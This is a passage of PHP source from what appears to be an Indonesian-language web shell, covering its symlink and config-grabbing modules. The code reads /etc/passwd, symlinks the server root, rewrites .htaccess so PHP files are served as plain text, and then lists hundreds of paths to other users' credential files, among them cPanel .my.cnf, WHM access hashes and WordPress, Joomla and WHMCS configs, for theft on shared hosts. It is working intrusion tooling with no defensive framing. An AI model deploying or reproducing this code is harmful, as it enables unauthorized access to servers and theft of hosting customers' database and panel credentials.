  2041.  $fw3 = fwrite($fp3,$file3);
  2042.  @fclose($fp3);
  2043.  echo "
  2044.  <table align=center border=1><tr>
  2045.  <td align=center><font size=3>S. No.</font></td>
  2046.  <td align=center><font size=3>Users</font></td>
  2047.  <td align=center><font size=3>Symlink</font></td></tr>";
  2048.  $dcount = 1;
  2049.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2050.  while(!feof($file)){
  2051.  $s = fgets($file);
  2052.  $matches = array();
  2053.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2054.  $matches = str_replace("home/","",$matches[1]);
  2055.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2056.  continue;
  2057.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2058.  <td align=center><font class=txt>" . $matches . "</td>";
  2059.  echo "<td align=center><font class=txt><a href=$full/os_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2060.  $dcount++;}fclose($file);
  2061.  echo "</table>";}else{if($os != "Windows"){@mkdir("os_sym",0777);@chdir("os_sym");@exe("ln -s / root");$file3 = '
  2062.  Options Indexes FollowSymLinks
  2063. DirectoryIndex berandal.htm
  2064. AddType text/plain .php
  2065. AddHandler text/plain .php
  2066. Satisfy Any
  2067. ';
  2068.  $fp3 = fopen('.htaccess','w');
  2069.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2070.  echo "
  2071.  <div class='mybox'><h1>Server Symlinker</h1>
  2072.  <table align=center border=1><tr>
  2073.  <td align=center><font size=3>ID</font></td>
  2074.  <td align=center><font size=3>Users</font></td>
  2075.  <td align=center><font size=3>Symlink</font></td></tr>";
  2076.  $temp = "";$val1 = 0;$val2 = 1000;
  2077.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2078.  if ($uid)$temp .= join(':',$uid)."\n";}
  2079.  echo '<br/>';$temp = trim($temp);$file5 =
  2080.  fopen("test.txt","w");
  2081.  fputs($file5,$temp);
  2082.  fclose($file5);$dcount = 1;$file =
  2083.  fopen("test.txt", "r") or exit("Unable to open file!");
  2084.  while(!feof($file)){$s = fgets($file);$matches = array();
  2085.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2086.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2087.  continue;
  2088.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2089.  <td align=center><font class=txt>" . $matches . "</td>";
  2090.  echo "<td align=center><font class=txt><a href=$full/os_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2091.  $dcount++;}
  2092.  fclose($file);
  2093.  echo "</table></div></center>";unlink("test.txt");
  2094.  } else
  2095.  echo "<center><font size=3>Gabisa buat Symlink, Jancok!</font></center>";
  2096.  }
  2097.  }    
  2098. }
  2099.  
  2100. elseif($_GET['666'] == 'config') {
  2101.     if($_POST){
  2102.         $passwd = $_POST['passwd'];
  2103.         mkdir("os_config", 0777);
  2104.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2105.         $htc = fopen("os_config/.htaccess","w");
  2106.         fwrite($htc, $isi_htc);
  2107.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2108.         foreach($user_config[1] as $user_os) {
  2109.             $user_config_dir = "/home/$user_os/public_html/";
  2110.             if(is_readable($user_config_dir)) {
  2111.                 $grab_config = array(
  2112.                                         "/home/$user_os/.my.cnf" => "CPanel",
  2113.                     "/home/$user_os/.accesshash" => "WHM-accesshash",
  2114.                     "/home/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2115.                     "/home/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2116.                     "/home/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2117.                     "/home/$user_os/public_html/clientarea/configuration.php" => "WHMCS",            
  2118.                     "/home/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2119.                     "/home/$user_os/public_html/forum/config.php" => "phpBB",
  2120.                     "/home/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2121.                     "/home/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2122.                     "/home/$user_os/public_html/app/etc/local.xml" => "Magento",
  2123.                     "/home/$user_os/public_html/admin/config.php" => "OpenCart",
  2124.                     "/home/$user_os/public_html/slconfig.php" => "Sitelok",
  2125.                     "/home/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2126.                     "/home/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2127.                     "/home/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2128.                     "/home/$user_os/public_html/central/configuration.php" => "WHM Central",
  2129.                     "/home/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2130.                     "/home/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2131.                     "/home/$user_os/public_html/submitticket.php" => "WHMCS",                                    
  2132.                     "/home/$user_os/public_html/configuration.php" => "Joomla",                  
  2133.                     "/home/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2134.                     "/home/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2135.                     "/home/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
  2136.                     "/home/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2137.                     "/home/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2138.                     "/home/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2139.                     "/home/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2140.                     "/home/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2141.                     "/home/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2142.                     "/home/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2143.                     "/home/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2144.                     "/home/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2145.                     "/home/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2146.                     "/home/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2147.                     "/home/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2148.                     "/home/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2149.                     "/home/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2150.                     "/home/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2151.                     "/home/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2152.                     "/home/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2153.                     "/home/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2154.                     "/home/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2155.                     "/home/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2156.                     "/home/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2157.                     "/home/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2158.                     "/home/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2159.                     "/home/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2160.                     "/home/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2161.                     "/home/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2162.                     "/home/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2163.                     "/home/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2164.                     "/home/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2165.                     "/home/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2166.                     "/home/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2167.                     "/home/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2168.                     "/home/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                  
  2169.                     "/home/$user_os/public_html/wp-config.php" => "WordPress",
  2170.                     "/home/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2171.                     "/home/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2172.                     "/home/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2173.                     "/home/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2174.                     "/home/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2175.                     "/home/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2176.                     "/home/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2177.                     "/home/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2178.                     "/home/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2179.                     "/home/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2180.                     "/home/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2181.                     "/home/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2182.                     "/home/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2183.                     "/home/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2184.                     "/home/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2185.                     "/home/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2186.                     "/home/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2187.                     "/home/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2188.                     "/home/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2189.                     "/home/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2190.                     "/home/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2191.                     "/home/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2192.                     "/home/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2193.                     "/home/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2194.                     "/home/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2195.                     "/home/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2196.                     "/home/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2197.                     "/home/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2198.                     "/home/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2199.                     "/home/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2200.                     "/home/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2201.                     "/home/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2202.                     "/home/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2203.                     "/home/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2204.                     "/home/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2205.                     "/home/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2206.                                         "/home1/$user_os/.my.cnf" => "cpanel",
  2207.                     "/home1/$user_os/.accesshash" => "WHM-accesshash",
  2208.                     "/home1/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2209.                     "/home1/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2210.                     "/home1/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2211.                     "/home1/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2212.                     "/home1/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2213.                     "/home1/$user_os/public_html/forum/config.php" => "phpBB",
  2214.                     "/home1/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2215.                     "/home1/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2216.                     "/home1/$user_os/public_html/app/etc/local.xml" => "Magento",
  2217.                     "/home1/$user_os/public_html/admin/config.php" => "OpenCart",
  2218.                     "/home1/$user_os/public_html/slconfig.php" => "Sitelok",
  2219.                     "/home1/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2220.                     "/home1/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2221.                     "/home1/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2222.                     "/home1/$user_os/public_html/central/configuration.php" => "WHM Central",
  2223.                     "/home1/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2224.                     "/home1/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2225.                     "/home1/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2226.                     "/home1/$user_os/public_html/configuration.php" => "Joomla",                  
  2227.                     "/home1/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2228.                     "/home1/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2229.                     "/home1/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2230.                     "/home1/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2231.                     "/home1/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2232.                     "/home1/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2233.                     "/home1/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2234.                     "/home1/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2235.                     "/home1/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2236.                     "/home1/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2237.                     "/home1/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2238.                     "/home1/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2239.                     "/home1/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2240.                     "/home1/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2241.                     "/home1/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2242.                     "/home1/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2243.                     "/home1/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2244.                     "/home1/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2245.                     "/home1/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2246.                     "/home1/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2247.                     "/home1/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2248.                     "/home1/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2249.                     "/home1/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2250.                     "/home1/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2251.                     "/home1/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2252.                     "/home1/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2253.                     "/home1/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2254.                     "/home1/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2255.                     "/home1/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2256.                     "/home1/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2257.                     "/home1/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2258.                     "/home1/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2259.                     "/home1/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2260.                     "/home1/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2261.                     "/home1/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2262.                     "/home1/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2263.                     "/home1/$user_os/public_html/wp-config.php" => "WordPress",
  2264.                     "/home1/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2265.                     "/home1/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2266.                     "/home1/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2267.                     "/home1/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2268.                     "/home1/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2269.                     "/home1/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2270.                     "/home1/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2271.                     "/home1/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2272.                     "/home1/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2273.                     "/home1/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2274.                     "/home1/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2275.                     "/home1/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2276.                     "/home1/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2277.                     "/home1/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2278.                     "/home1/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2279.                     "/home1/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2280.                     "/home1/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2281.                     "/home1/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2282.                     "/home1/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2283.                     "/home1/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2284.                     "/home1/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2285.                     "/home1/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2286.                     "/home1/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2287.                     "/home1/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2288.                     "/home1/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2289.                     "/home1/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2290.                     "/home1/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2291.                     "/home1/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2292.                     "/home1/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2293.                     "/home1/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2294.                     "/home1/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2295.                     "/home1/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2296.                     "/home1/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2297.                     "/home1/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2298.                     "/home1/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2299.                     "/home1/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2300.                                         "/home2/$user_os/.my.cnf" => "cpanel",
  2301.                     "/home2/$user_os/.accesshash" => "WHM-accesshash",
  2302.                     "/home2/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2303.                     "/home2/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2304.                     "/home2/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2305.                     "/home2/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2306.                     "/home2/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2307.                     "/home2/$user_os/public_html/forum/config.php" => "phpBB",
  2308.                     "/home2/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2309.                     "/home2/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2310.                     "/home2/$user_os/public_html/app/etc/local.xml" => "Magento",
  2311.                     "/home2/$user_os/public_html/admin/config.php" => "OpenCart",
  2312.                     "/home2/$user_os/public_html/slconfig.php" => "Sitelok",
  2313.                     "/home2/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2314.                     "/home2/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2315.                     "/home2/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2316.                     "/home2/$user_os/public_html/central/configuration.php" => "WHM Central",
  2317.                     "/home2/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2318.                     "/home2/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2319.                     "/home2/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2320.                     "/home2/$user_os/public_html/configuration.php" => "Joomla",                  
  2321.                     "/home2/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2322.                     "/home2/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2323.                     "/home2/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2324.                     "/home2/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2325.                     "/home2/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2326.                     "/home2/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2327.                     "/home2/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2328.                     "/home2/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2329.                     "/home2/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2330.                     "/home2/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2331.                     "/home2/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2332.                     "/home2/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2333.                     "/home2/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2334.                     "/home2/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2335.                     "/home2/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2336.                     "/home2/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2337.                     "/home2/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2338.                     "/home2/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2339.                     "/home2/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2340.                     "/home2/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2341.                     "/home2/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2342.                     "/home2/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2343.                     "/home2/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2344.                     "/home2/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2345.                     "/home2/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2346.                     "/home2/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2347.                     "/home2/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2348.                     "/home2/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2349.                     "/home2/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2350.                     "/home2/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2351.                     "/home2/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2352.                     "/home2/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2353.                     "/home2/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2354.                     "/home2/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2355.                     "/home2/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2356.                     "/home2/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2357.                     "/home2/$user_os/public_html/wp-config.php" => "WordPress",
  2358.                     "/home2/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2359.                     "/home2/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2360.                     "/home2/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2361.                     "/home2/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2362.                     "/home2/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2363.                     "/home2/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2364.                     "/home2/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2365.                     "/home2/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2366.                     "/home2/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2367.                     "/home2/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2368.                     "/home2/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2369.                     "/home2/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2370.                     "/home2/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2371.                     "/home2/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2372.                     "/home2/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2373.                     "/home2/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2374.                     "/home2/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2375.                     "/home2/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2376.                     "/home2/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2377.                     "/home2/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2378.                     "/home2/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2379.                     "/home2/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2380.                     "/home2/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2381.                     "/home2/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2382.                     "/home2/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2383.                     "/home2/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2384.                     "/home2/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2385.                     "/home2/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2386.                     "/home2/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2387.                     "/home2/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2388.                     "/home2/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2389.                     "/home2/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2390.                     "/home2/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2391.                     "/home2/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2392.                     "/home2/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2393.                     "/home2/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2394.                     "/home3/$user_os/.my.cnf" => "cpanel",
  2395.                     "/home3/$user_os/.accesshash" => "WHM-accesshash",
  2396.                     "/home3/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2397.                     "/home3/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2398.                     "/home3/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2399.                     "/home3/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2400.                     "/home3/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2401.                     "/home3/$user_os/public_html/forum/config.php" => "phpBB",
  2402.                     "/home3/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2403.                     "/home3/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2404.                     "/home3/$user_os/public_html/app/etc/local.xml" => "Magento",
  2405.                     "/home3/$user_os/public_html/admin/config.php" => "OpenCart",
  2406.                     "/home3/$user_os/public_html/slconfig.php" => "Sitelok",
  2407.                     "/home3/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2408.                     "/home3/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2409.                     "/home3/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2410.                     "/home3/$user_os/public_html/central/configuration.php" => "WHM Central",
  2411.                     "/home3/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2412.                     "/home3/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2413.                     "/home3/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2414.                     "/home3/$user_os/public_html/configuration.php" => "Joomla",                  
  2415.                     "/home3/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2416.                     "/home3/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2417.                     "/home3/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2418.                     "/home3/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2419.                     "/home3/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2420.                     "/home3/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2421.                     "/home3/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2422.                     "/home3/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2423.                     "/home3/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2424.                     "/home3/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2425.                     "/home3/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2426.                     "/home3/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2427.                     "/home3/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2428.                     "/home3/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2429.                     "/home3/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2430.                     "/home3/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2431.                     "/home3/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2432.                     "/home3/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2433.                     "/home3/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
